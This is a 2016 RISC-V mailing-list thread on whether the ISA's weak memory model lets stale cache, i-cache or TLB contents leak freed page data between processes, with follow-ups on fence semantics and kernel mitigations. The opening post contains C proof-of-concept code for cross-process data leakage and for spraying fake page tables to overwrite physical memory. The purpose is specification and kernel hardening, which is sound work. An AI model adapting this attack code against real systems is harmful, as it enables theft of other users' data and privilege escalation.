Possible implications of the weak RISC-V memory model for security on Linux and other kernels?


Stefan O'Rear

Aug 13, 2016, 3:08:13 AM
to isa...@groups.riscv.org
Is it generally known that RISC-V's memory model is weaker than anything in
current wide use with Linux, and is at a high level the same as Alpha, as it
permits reordering of dependent reads?

Thinking about the behavior of allocation-time page zeroing in an environment
with caches that reorder dependent reads, I have the impression that the current
RISC-V Linux port is not quite doing enough to prevent reordered memory accesses
from exposing the contents of freed pages. I am not sure if this impression is
accurate, so I'd like some more opinions on this. This message is written from
the perspective of Linux but I think it is applicable to any kernel which
implements page-based virtual memory shared between mutually untrusting users.

POSIX expects any page allocated to a process to be filled with zeros; this can
be done at free time, at allocate time, or anywhere in between. Linux zeros at
allocation; since the zeroing is done in thread context the calling thread is
guaranteed to not see the page's old data in any reasonable memory model.
However, if *another* thread in the same process immediately attempts to read
the newly allocated page, the memory model and the kernel must collaborate to
avoid exposing data from the page's previous owner.

Since a zeroed page's address only becomes visible to other threads after being
written into the page table, I think address dependency barriers as implemented
by ARM and PowerPC (side note: does anyone have a reference for how these are
actually implemented?) are sufficient to prevent visibility of freed data, if
the allocating thread executes a write barrier between zeroing and creating the
PTE (which Linux does).
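
Concretely, the pattern looks like this user-level C11 analogue (a sketch only, not kernel code; `published` stands in for the PTE, and the release fence plays the role of the kernel's write barrier):

```
#include <assert.h>
#include <stdatomic.h>
#include <string.h>

static char page[4096];
static _Atomic(char *) published;               /* stands in for the PTE        */

void producer(void) {                           /* allocating thread            */
    memset(page, 0, sizeof page);               /* "clear_page"                 */
    atomic_thread_fence(memory_order_release);  /* the write barrier (w,w)      */
    atomic_store_explicit(&published, page, memory_order_relaxed); /* "set PTE" */
}

void consumer(void) {                           /* another thread, same process */
    char *p = atomic_load_explicit(&published, memory_order_consume);
    if (p)
        assert(p[2048] == 0);  /* ordered after the load of `published` only by
                                  the address dependency on p                   */
}
```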

As RISC-V does not guarantee ordering with address dependency, it appears that a
kernel which wants to run on arbitrary RISC-V implementations must proactively
shoot down stale cached data, by doing an inter-processor interrupt with the
effect of a `fence r,rw; fence.i; sfence.vm x0` after any time pages are zeroed.
Linux does not do this (including on Alpha, which would theoretically also
require it?), leading to three anomalies discussed below *if* the CPU
reorders memory aggressively enough.

(If this is correct, then the question becomes how to minimize the cost of the
shootdown. For now I'm more interested in "if" though.)
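
For concreteness, the shootdown I have in mind amounts to running something like this on every other hart (a sketch; `ipi_broadcast_and_wait` is a hypothetical placeholder for "run this on all other harts and wait", not an existing kernel API):

```
#include <stddef.h>

/* hypothetical helper: run fn(arg) on every other hart and wait for completion */
extern void ipi_broadcast_and_wait(void (*fn)(void *), void *arg);

static void stale_view_shootdown(void *unused) {
    (void)unused;
    __asm__ __volatile__(
        "fence r, rw\n\t"   /* order/discard any stale data-side reads       */
        "fence.i\n\t"       /* discard any stale instruction-cache contents  */
        "sfence.vm x0"      /* discard any stale address translations        */
        ::: "memory");
}

void after_page_zeroing(void) {
    ipi_broadcast_and_wait(stale_view_shootdown, NULL);
}
```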

## On page zeroing

```
#include <assert.h>
#include <sys/mman.h>

volatile char bss[1 << 28];
volatile int faulted;

void thread_a() {
    /* touch one byte per page: Linux allocates and zeroes each page on
       its first write, then publish the index in `faulted` */
    for (int poke = 0; poke < sizeof(bss); poke += 4096) {
        bss[poke] = 1;
        faulted = poke;
    }
}

void thread_b() {
    while (1) {
        /* no fence between learning `faulted` and reading the page */
        char read = bss[faulted + 2048];
        assert(read == 0);
    }
}

void victim() {
    while (1) {
        char* page = mmap(0, 4096, PROT_READ|PROT_WRITE,
                          MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        page[2048] = 1;
        munmap(page, 4096);
    }
}
```

This is the easiest case to exploit but also the easiest to mitigate, as
`fence r,rw` suffices.

Thread A repeatedly allocates pages (Linux does page allocation on first write,
other kernels do allocation at different times but the code can be adapted).
Each time `faulted` is updated, thread B eventually learns this, but since there
are no fence instructions here, the subsequent read in thread B might return
arbitrarily stale data.

Thread B does two significant reads: one of the page table, to find the newly
allocated page, and one of the data in the new page. If the first read sees the
new page, but the second read returns stale data from a cache, this can leak
data from the victim thread (which could be another process running with another
user ID) to thread B.
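
For illustration only, the ordering that is missing in thread B is the one a read fence between its two loads would supply; under the usual fence-pairing rules that should prevent the stale read, but of course the kernel cannot rely on untrusted user code inserting it (sketch, reusing the declarations above):

```
#include <assert.h>

extern volatile char bss[1 << 28];   /* from the example above */
extern volatile int faulted;

void thread_b_fenced(void) {
    while (1) {
        int idx = faulted;                               /* read 1: observe allocation */
        __asm__ __volatile__("fence r, r" ::: "memory"); /* the missing ordering       */
        char read = bss[idx + 2048];                     /* read 2: the page contents  */
        assert(read == 0);
    }
}
```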

## Hiding in the i-cache

This is trickier because it requires the victim's pages to contain something
resembling valid instructions, and since realistic implementations will not
speculatively load random lines into I$, the victim must also have executed the
code; that makes this less useful for general exfiltration, but it could
theoretically be used against JITs or as a covert channel. On the other hand, it
is much more expensive to mitigate because of the requirement for an i-cache
shootdown.

W^X complicates this if enabled in the kernel. I suspect it can be worked
around but haven't worked out the details. Also, there's potential for a lot of
weirdness here if a page with unexpected content is mapped.

```
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>

volatile char bss[1 << 28];
volatile int faulted;

void thread_a() {
    mprotect((void*)bss, sizeof(bss), PROT_READ|PROT_WRITE|PROT_EXEC);
    /* allocate pages and signal to thread B without fences */
    for (int poke = 0; poke < sizeof(bss); poke += 4096) {
        bss[poke] = 1;
        faulted = poke;
    }
}

jmp_buf onill;
void illhand(int signo) {
    longjmp(onill, 1);
}

void thread_b() {
    mprotect((void*)bss, sizeof(bss), PROT_READ|PROT_WRITE|PROT_EXEC);
    /* we need to recover from invalid instruction faults */
    struct sigaction sa;
    sa.sa_handler = illhand;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;
    sigaction(SIGILL, &sa, 0);

    while (1) {
        if (!setjmp(onill)) {
            int secret = ((int(*)())(bss + faulted + 2048))();
            assert(0);
        }
        /* if the victim line wasn't resident in i-cache, we'll
           most likely execute 0 and trap SIGILL, try again */
        /* or, we just jumped into a dirty page from something
           other than the designated victim, and execution is
           now entirely off the rails. */
    }
}

void victim() {
    while (1) {
        char* page = mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,
                          MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        /* addi x10, x0, 42; jalr x0, 0(x1) */
        memcpy(page+2048, "\x13\x05\xa0\x02" "\x67\x80\x00\x00", 8);
        ((int(*)())(page+2048))();
        /* our secret data is now in I$ */
        munmap(page, 4096);
    }
}
```

## sfence.vm and overwriting physical memory

This is a special case where the stale memory view is the TLB. On plausible
implementations (the TLB is loaded from the D$, and only for page table walking, no
other reason), this can be mitigated with an interprocessor `fence r,rw`. In
the most general case allowed by the RISC-V spec, interprocessor `sfence.vm` is
required here, but since page table allocation is much rarer than page
allocation that might be fine.

We're not going to do exfiltration here; if we can get the receiver thread to
treat stale user-mode data as a page table, then we can be much more ambitious
and try to write arbitrary physical memory.

```
#include <assert.h>
#include <stdint.h>
#include <sys/mman.h>

/* attack parameters; assumes the legitimate value at attack_address is non-zero */
const uintptr_t attack_address = 0x8000000;
const uintptr_t new_value = 42;

void thread_a() {
    /* spray memory with fake page tables */
    while (1) {
        uintptr_t* page = mmap(0, 4096, PROT_READ|PROT_WRITE,
                               MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        for (int i = 0; i < 4096 / sizeof(uintptr_t); i++) {
            page[i] = attack_address | 0xFF; /* DAGURWXV */
        }
        munmap(page, 4096);
    }
}

volatile uintptr_t* volatile vaddr;
void thread_b() {
    /* allocate fresh page tables */
    while (1) {
        vaddr = mmap(0, 4096*(4096/sizeof(uintptr_t)), PROT_READ,
                     MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        uintptr_t get = *vaddr; /* allocates a page table, writes to the PMD */
        (void)get;
    }
}

void thread_c() {
    while (1) {
        /* we have learned through a data race on the PMD an address for a
           freshly allocated and zeroed page table. except that any given
           PTE might be stale data written by thread_a. */
        if (vaddr != 0 && *vaddr != 0) {
            /* oops. we can only get here if we just read a mapping
               into the TLB from one of the fake page tables;
               *vaddr aliases attack_address, and we're assuming the
               legitimate value was non-zero */
            *vaddr = new_value;
            assert(0);
        }
    }
}
```

Michael Clark

Aug 14, 2016, 1:53:23 AM
to Stefan O'Rear, isa...@groups.riscv.org
Hi Stefan, All,

The points you raise are very interesting, especially for out-of-order RISC-V implementations. A cache-coherent, single-issue, in-order unit may pass these tests without actually exercising the formal memory model of RISC-V, which, as you mention, is relaxed.

The specification seems clear that no ordering is guaranteed between threads without an explicit fence, so I can see your sample code forming the basis of a cache coherency test. It would be quite neat to have an aggressively out-of-order implementation on which these tests fail, and which then passes with the correct fence instructions.

On 13 Aug 2016, at 7:08 PM, Stefan O'Rear <sor...@gmail.com> wrote:

As RISC-V does not guarantee ordering with address dependency, it appears that a
kernel which wants to run on arbitrary RISC-V implementations must proactively
shoot down stale cached data, by doing an inter-processor interrupt with the
effect of a `fence r,rw; fence.i; sfence.vm x0` after any time pages are zeroed.
Linux does not do this (including on Alpha, which would theoretically also
require it?), leading to three anomalies discussed below *if* the CPU
reorders memory aggressively enough.

However I have a much more mundane question for the ISA developers.

The `fence` and `sfence.vm` instructions are currently defined in the ISA spec as respectively taking 0b1111_1111 and x0 as operands.

Thus fence is currently specified as a conservative full IO and memory barrier:

  fence iorw,iorw

However, I have a minor issue with the specification: the assembly operand order has not always been clear. For example, rd is on the left in the assembler notation and on the right in the instruction format table (by nature of the position of the fields within the bit encoding). Also, the assembly operands have been removed from the table beginning on page 54 of the latest version of the ISA spec.

I have typically read the simulator source to clarify operand order; however, in this case these two instructions don't currently take any assembly operands.

So am I reading the fence instruction correctly as the following?

  fence <succ>,<pred>

Such that `fence r,rw` means no successive reads can be observed until all previous reads and writes before the fence have completed.

The reason I raise it is that an ISA metadata tool is raising two warnings on a variant of the Base ISA opcodes file, where the operand order is currently pred succ (the left-to-right bit encoding from the spec):

WARNING: codec deduction failure: fence                 codec_key: pred·succ
WARNING: codec deduction failure: sfence.vm             codec_key: rs1

If someone can clarify I could fix these two metadata warnings and use x0 in the disassembler for sfence.vm.

Regards,
Michael.

Andrew Waterman

Aug 19, 2016, 4:09:07 PM
to Michael Clark, Stefan O'Rear, RISC-V ISA Dev
It is the other way around (i.e., fence pred, succ). I don't think
the assembly syntax for FENCE is ever explicitly stated in the ISA
manual, but in the atomics chapter commentary there is a consistent
code example.
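
For the archives, with the pred,succ reading the conventional acquire/release mappings come out as follows (a sketch in C with inline asm, not quoted from the manual):

```
/* "fence pred, succ" orders every earlier access in the pred set before
   every later access in the succ set. */

/* release: make earlier reads and writes visible before the flag store */
static inline void store_release(volatile int *flag) {
    __asm__ __volatile__("fence rw, w" ::: "memory");
    *flag = 1;
}

/* acquire: keep later reads and writes after the flag load */
static inline int load_acquire(volatile int *flag) {
    int v = *flag;
    __asm__ __volatile__("fence r, rw" ::: "memory");
    return v;
}
```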

>
> The reason I raise it, as there is an ISA metadata tool that is raising two
> warnings on a variant of the Base ISA opcodes file, and the operand order is
> currently pred succ (the left to right bit encoding from the spec):
>
> WARNING: codec deduction failure: fence codec_key: pred·succ
> WARNING: codec deduction failure: sfence.vm codec_key: rs1
>
> If someone can clarify I could fix these two metadata warnings and use x0 in
> the disassembler for sfence.vm.
>
> Regards,
> Michael.
>

Andrew Waterman

Aug 20, 2016, 3:03:18 AM
to Stefan O'Rear, RISC-V ISA Dev
Pardon the terse response to an important topic.

The RISC-V memory model is underspecified. Ongoing efforts aim to
tighten it up.

It's hard to discuss these specific cases without an operational model
of RISC-V harts, but I expect such a model will ultimately stipulate
that RAW hazards between instructions imply the corresponding memory
ordering constraints you'd expect.

Stefan O'Rear

Aug 20, 2016, 3:39:59 AM
to Andrew Waterman, RISC-V ISA Dev
On Sat, Aug 20, 2016 at 12:02 AM, Andrew Waterman <and...@sifive.com> wrote:
> Pardon the terse response to an important topic.
>
> The RISC-V memory model is underspecified. Ongoing efforts aim to
> tighten it up.
>
> It's hard to discuss these specific cases without an operational model
> of RISC-V harts, but I expect such a model will ultimately stipulate
> that RAW hazards between instructions imply the corresponding memory
> ordering constraints you'd expect.

Thank you.

"RAW hazards" sounds like it's describing an ARM/PowerPC-style
"address dependency" system, which would also be relevant for the
ongoing work to formalize memory_order_consume in the C and C++ WGs.
I'll be quite interested to see the results of this when they are
ready.

-s

Andrew Waterman

Aug 20, 2016, 5:13:57 AM
to Stefan O'Rear, RISC-V ISA Dev
Yes, something along those lines (though hopefully easier to digest,
in the end).


Andrew Lutomirski

Oct 5, 2016, 11:33:06 AM
to RISC-V ISA Dev
I may be biased by my x86 experience, but I think the problem is worse than your post suggests.


On Saturday, August 13, 2016 at 12:08:13 AM UTC-7, sorear2 wrote:

Since a zeroed page's address only becomes visible to other threads after being
written into the page table

I don't think that the zeroed page's address' visibility is relevant, unfortunately.

CPU A:

 - call mmap()
   - zero a page.
   - fence?
   - write a PTE.

CPU B:

 - Access the page.

CPU B has a decent chance of getting an exception, but suppose it gets lucky and waits long enough before reading the page that it doesn't get an exception.  What does it see?  What TLB entry is created?

I think that CPU A is going to need that fence (as a w,w fence) regardless of what the final RISC-V memory model says, but there are no relevant fence instructions or explicit dependencies at all on CPU B to synchronize with it.  Unless I'm missing something (and I have no idea how Alpha deals with it), there are only two ways to make this safe.  Either CPU A needs to send an IPI before writing a PTE (please, please don't do that.  TLB flush IPIs are bad enough (and RISC-V should consider following ARM64's lead and adding a non-IPI way to handle this), but TLB population IPIs would be far worse), or the CPU should implicitly order all accesses involved in TLB fills.  That is, reads of higher-level paging structures should be ordered before reads of lower-level paging structures, and reads of the final PTE should be ordered before any reads or writes that use the TLB entry that gets filled.
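
Spelled out as if the hardware walk were done in software, the implicit ordering I'm asking for is roughly this (a sketch; vpn1/vpn0/pte_to_va are hypothetical helpers and the address arithmetic is simplified):

```
#include <stddef.h>
#include <stdint.h>

/* hypothetical helpers; the address arithmetic is beside the point */
extern size_t vpn1(uintptr_t va);
extern size_t vpn0(uintptr_t va);
extern const void *pte_to_va(uintptr_t entry);

char translate_and_load(const uintptr_t *root, uintptr_t va) {
    uintptr_t pde = root[vpn1(va)];       /* read of the higher-level table   */

    /* constraint 1: the read above must be ordered before ...                */
    const uintptr_t *pt = pte_to_va(pde);
    uintptr_t pte = pt[vpn0(va)];         /* ... the read of the leaf PTE     */

    /* constraint 2: the leaf PTE read must be ordered before any load or
       store performed through the TLB entry it produces                      */
    const char *data = pte_to_va(pte);
    return data[va & 4095];               /* the access that uses the fill    */
}
```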

I don't think there's any need to order the first read involved in the TLB fill with anything prior -- even x86 permits fully speculative TLB fills, and I don't think it's ever caused a problem. *

* Maybe it has.  CPU A could create a cacheable mapping of memory that can't be safely cached and then destroy the mapping without accessing it at all.  CPU B could, in theory, speculatively load the translation and fetch the cache line.  Boom.  I've never heard of this happening.  On the other hand, I haven't been involved in this stuff when old enough CPUs that had fragile enough cache coherency schemes to care were still common.

 

Stefan O'Rear

Oct 8, 2016, 12:32:28 AM
to Andrew Lutomirski, RISC-V ISA Dev
On Wed, Oct 5, 2016 at 8:33 AM, Andrew Lutomirski <aml...@gmail.com> wrote:
> CPU B has a decent chance of getting an exception, but suppose it gets lucky
> and waits long enough before reading the page that it doesn't get an
> exception. What does it see? What TLB entry is created?

I didn't mention this, but I already said you need page table
population IPIs, and if you're doing that you might as well also have
population IPIs for the PGD, PMD, and PUD, which handles this case. Yucky, but with
the "RAW dependencies" change I've mentioned a couple times today it
goes away.

> I think that CPU A is going to need that fence (as a w,w fence) regardless
> of what the final RISC-V memory model says, but there are no relevant fence
> instructions or explicit dependencies at all on CPU B to synchronize with
> it. Unless I'm missing something (and I have no idea how Alpha deals with
> it), there are only two ways to make this safe. Either CPU A needs to send

There's a comment in the kernel source which implies that the TLB fill
PALcode on Alpha contains the necessary acquire fences.

> an IPI before writing a PTE (please, please don't do that. TLB flush IPIs
> are bad enough (and RISC-V should consider following ARM64's lead and adding
> a non-IPI way to handle this), but TLB population IPIs would be far worse),
> or the CPU should implicitly order all accesses involved in TLB fills. That
> is, reads of higher-level paging structures should be ordered before reads
> of lower-level paging structures, and reads of the final PTE should be
> ordered before any reads or writes that use the TLB entry that gets filled.

The page table walk is an address dependency chain so it falls out of
the address dependency change. Would be good to be explicit in the
documentation of course.

> I don't think there's any need to order the first read involved in the TLB
> fill with anything prior -- even x86 permits fully speculative TLB fills,
> and I don't think it's ever caused a problem. *

Here's one way it could break: a single-threaded process on hart A
maps a file, unmaps it and maps something else (Linux elides TLB
shootdown on munmap for single-threaded processes, right?), gets put
to sleep and then migrated to another hart B. If hart B is allowed to
speculatively fill TLBs with no constraints whatsoever, then hart B
might have a stale copy of the process' first mapping, despite never
having seen the SPTBR value before. I think this might be addressable
by forcing SFENCE.VM the first time a given hart schedules a given
process, though.
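
A sketch of that idea, tracking which harts have ever run the mm and fencing on first use (mm_cpumask() and cpumask_test_and_set_cpu() are real kernel interfaces, but this function is illustrative pseudocode, not the actual RISC-V switch_mm()):

```
/* called on the context-switch path when `next` is about to run on `cpu` */
static void sfence_on_first_schedule(struct mm_struct *next, unsigned int cpu) {
    if (!cpumask_test_and_set_cpu(cpu, mm_cpumask(next)))
        /* first time this hart runs this address space: discard any
           speculatively filled translations for it */
        __asm__ __volatile__("sfence.vm x0" ::: "memory");
}
```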

Speculative instruction caching is potentially worse; a programmer
might assume you can allocate a zeroed page, write instructions into
it, and jump, but the processor is allowed to speculatively cache the
zeros in the page and trap an illegal instruction on the jump if you
don't include a FENCE.I. You can't even fix this up in a SIGILL
handler because you might be using the C extension, and misaligned
32-bit instructions are not fetched atomically so you might wind up
with _half_ of an instruction speculatively cached as zero, which
won't always make it invalid.
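
For reference, the pattern a JIT (or anything writing instructions into a freshly allocated page) needs on RISC-V looks like this; a sketch assuming `code` is already mapped writable and executable:

```
#include <stddef.h>
#include <string.h>

typedef int (*jit_fn)(void);

int write_and_run(unsigned char *code, const unsigned char *insns, size_t len) {
    memcpy(code, insns, len);                     /* store the instructions       */
    __asm__ __volatile__("fence.i" ::: "memory"); /* make this hart's instruction
                                                     fetches see the stores above */
    return ((jit_fn)code)();                      /* only now is the jump safe    */
}
```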

Also, the kernel needs to do a global FENCE.I shootdown when it zeros
a page, just in case the page's previous owner wrote sensitive
instructions in it. On Rocket FENCE.I is implemented by throwing out
the entire 32KB first-level I-cache; I think that could get expensive
to do for every hart once per clear_page but I don't feel my intuition
is reliable here.

-s

Jacob Bachmeyer

Oct 9, 2016, 11:14:52 PM
to Stefan O'Rear, Andrew Lutomirski, RISC-V ISA Dev
Stefan O'Rear wrote:
> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
> a page, just in case the page's previous owner wrote sensitive
> instructions in it. On Rocket FENCE.I is implemented by throwing out
> the entire 32KB first-level I-cache; I think that could get expensive
> to do for every hart once per clear_page but I don't feel my intuition
> is reliable here.
>

Why would this be needed? FENCE.I only ensures that instruction fetch
will see data stores; there is no way to read the I-cache into registers
or write its contents to data memory. Further, if the mapping was not
executable, then the page cannot be in the I-cache at all. So at least
data pages will not need this.

How can "sensitive instructions" even exist? What are "sensitive
instructions"? How could this lead to an exploit with any more chance
of success than accessing a supervisor address over and over and hoping
for a bit-error loading the TLB?

-- Jacob

Stefan O'Rear

Oct 9, 2016, 11:31:29 PM
to Jacob Bachmeyer, Andrew Lutomirski, RISC-V ISA Dev
On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
> Stefan O'Rear wrote:
>>
>> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
>> a page, just in case the page's previous owner wrote sensitive
>> instructions in it. On Rocket FENCE.I is implemented by throwing out
>> the entire 32KB first-level I-cache; I think that could get expensive
>> to do for every hart once per clear_page but I don't feel my intuition
>> is reliable here.
>>
>
>
> Why would this be needed? FENCE.I only ensures that instruction fetch will
> see data stores; there is no way to read the I-cache into registers or write
> its contents to data memory.

You can read the contents of the I-cache by jumping into it and getting lucky.

> Further, if the mapping was not executable,
> then the page cannot be in the I-cache at all. So at least data pages will
> not need this.

This is "common sense", which is not the same as "actually specified".
The spec does not forbid an implementation from doing speculative
I-cache loads against X=0 pages and later using the stale cached data
after an X=1 PTE is loaded. X bit is only required to check at
execute time, not load-from-RAM time.

My current favorite example of what can elude even relatively mature
memory models is the "out-of-thin-air problem",
https://isocpp.org/files/papers/N3710.html . This stuff is slippery
in a way that very few things are outside of
foundations-of-mathematics.

>
> How can "sensitive instructions" even exist? What are "sensitive
> instructions"?

Bit patterns which, when executed as instructions by some process,
reveal information to that process.

> How could this lead to an exploit with any more chance of
> success than accessing a supervisor address over and over and hoping for a
> bit-error loading the TLB?

Never bet against the creativity of exploit authors. I have seen
"hoping for a bit error" turned into a working exploit.

-s

Andrew Lutomirski

Oct 10, 2016, 12:09:59 AM
to Stefan O'Rear, Jacob Bachmeyer, RISC-V ISA Dev

On Oct 9, 2016 8:31 PM, "Stefan O'Rear" <sor...@gmail.com> wrote:
>
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:

> > Further, if the mapping was not executable,
> > then the page cannot be in the I-cache at all.  So at least data pages will
> > not need this.
>
> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded.  X bit is only required to check at
> execute time, not load-from-RAM time.
>

It's a little worse.  Suppose I map a page X, then execute from it, then unmap it, change the contents, and map it again.  The CPU has to notice the new contents somehow.

This isn't even just an exploit issue.  This could go wrong entirely by accident.

Stefan O'Rear

unread,
Oct 10, 2016, 12:30:44 AM10/10/16
to Andrew Lutomirski, Jacob Bachmeyer, RISC-V ISA Dev
I think this is why the kernel flushes the icache on [most PTE populations][1].

[1] https://github.com/torvalds/linux/blob/24532f768/mm/memory.c#L3030

The RISC-V port seems to be using the asm-generic definition of
flush_icache_page, which is a no-op macro. I can't say with certainty
that's wrong, but it seems weird.

It occurs to me fence.i can be deferred from page zeroing until the
first time a page is mapped X=1; as long as the page is X=0 stale data
in the i-cache is unobservable.
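
Roughly, in the style of the PG_arch_1 tricks other ports use (a sketch, not the RISC-V port's actual flush_icache_page()):

```
/* The bit would be cleared whenever the page is freed or re-zeroed; the
   global FENCE.I is then paid only on the first executable mapping.
   flush_icache_all() is a stand-in for a global FENCE.I shootdown. */
static void flush_icache_page_deferred(struct vm_area_struct *vma,
                                       struct page *page) {
    if (!(vma->vm_flags & VM_EXEC))
        return;                        /* X=0: stale I$ lines stay unobservable */
    if (!test_and_set_bit(PG_arch_1, &page->flags))
        flush_icache_all();            /* first X=1 mapping of these contents   */
}
```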

(Do implementations correctly handle misaligned instructions extending
from an X=1 page into an X=0 page?)

We may wind up with a world where most high-performance
implementations have coherent I-caches. Unclear.

-s

Alex Elsayed

unread,
Oct 10, 2016, 6:44:11 AM10/10/16
to isa...@groups.riscv.org
On Sunday, 9 October 2016 20:31:26 PDT Stefan O'Rear wrote:
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
> > Stefan O'Rear wrote:

<snip>

> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded. X bit is only required to check at
> execute time, not load-from-RAM time.
>
> My current favorite example of what can elude even relatively mature
> memory models is the "out-of-thin-air problem",
> https://isocpp.org/files/papers/N3710.html . This stuff is slippery
> in a way that very few things are outside of
> foundations-of-mathematics.

You may find this recent work interesting, on that note:

http://sf.snu.ac.kr/promise-concurrency/

A set of slides that summarize it nicely:

http://www.mpi-sws.org/~dreyer/talks/talk-wg28-2016.pdf

<snip>


Jacob Bachmeyer

Oct 10, 2016, 6:46:30 PM
to Stefan O'Rear, Andrew Lutomirski, RISC-V ISA Dev
Stefan O'Rear wrote:
> On Sun, Oct 9, 2016 at 8:14 PM, Jacob Bachmeyer <jcb6...@gmail.com> wrote:
>
>> Stefan O'Rear wrote:
>>
>>> Also, the kernel needs to do a global FENCE.I shootdown when it zeros
>>> a page, just in case the page's previous owner wrote sensitive
>>> instructions in it. On Rocket FENCE.I is implemented by throwing out
>>> the entire 32KB first-level I-cache; I think that could get expensive
>>> to do for every hart once per clear_page but I don't feel my intuition
>>> is reliable here.
>>>
>> Why would this be needed? FENCE.I only ensures that instruction fetch will
>> see data stores; there is no way to read the I-cache into registers or write
>> its contents to data memory.
>>
>
> You can read the contents of the I-cache by jumping into it and getting lucky.
>

The "getting lucky" part is what I would expect to be incredibly
unlikely. Then again, I thought Rowhammer "would never happen" until it
did.

>> Further, if the mapping was not executable,
>> then the page cannot be in the I-cache at all. So at least data pages will
>> not need this.
>>
>
> This is "common sense", which is not the same as "actually specified".
> The spec does not forbid an implementation from doing speculative
> I-cache loads against X=0 pages and later using the stale cached data
> after an X=1 PTE is loaded. X bit is only required to check at
> execute time, not load-from-RAM time.
>

Then perhaps the spec should be changed to require that speculative loads
which would cause an access fault if used be immediately discarded?
Or to require that a speculative load be aborted immediately with no
effect on any potentially-visible state if a fault is detected?

Filling an I-cache line must first resolve a PTE to get a physical
address. A speculative cacheline fill should be silently aborted if the
TLB reports an access fault. A non-speculative fill, of course, traps
on an access fault.

Another, more general wording: Any speculative operation that would
trap if it were non-speculative must be canceled in such a way that it
leaves no effect.

In other words, we should "actually specify" the "common sense" in this
case. :)

> My current favorite example of what can elude even relatively mature
> memory models is the "out-of-thin-air problem",
> https://isocpp.org/files/papers/N3710.html . This stuff is slippery
> in a way that very few things are outside of
> foundations-of-mathematics.
>

This is why I think that tightening the spec is wise when edge cases
like this are found.

>> How can "sensitive instructions" even exist? What are "sensitive
>> instructions"?
>>
>
> Bit patterns which, when executed as instructions by some process,
> reveal information to that process.
>

Fair enough.

>> How could this lead to an exploit with any more chance of
>> success than accessing a supervisor address over and over and hoping for a
>> bit-error loading the TLB?
>>
>
> Never bet against the creativity of exploit authors. I have seen
> "hoping for a bit error" turned into a working exploit

Rowhammer works by *causing* bit errors. Is there really something so
laughably unreliable out there that *sitting* *back* *and* *waiting*
leads to exploitable errors, consistently?


-- Jacob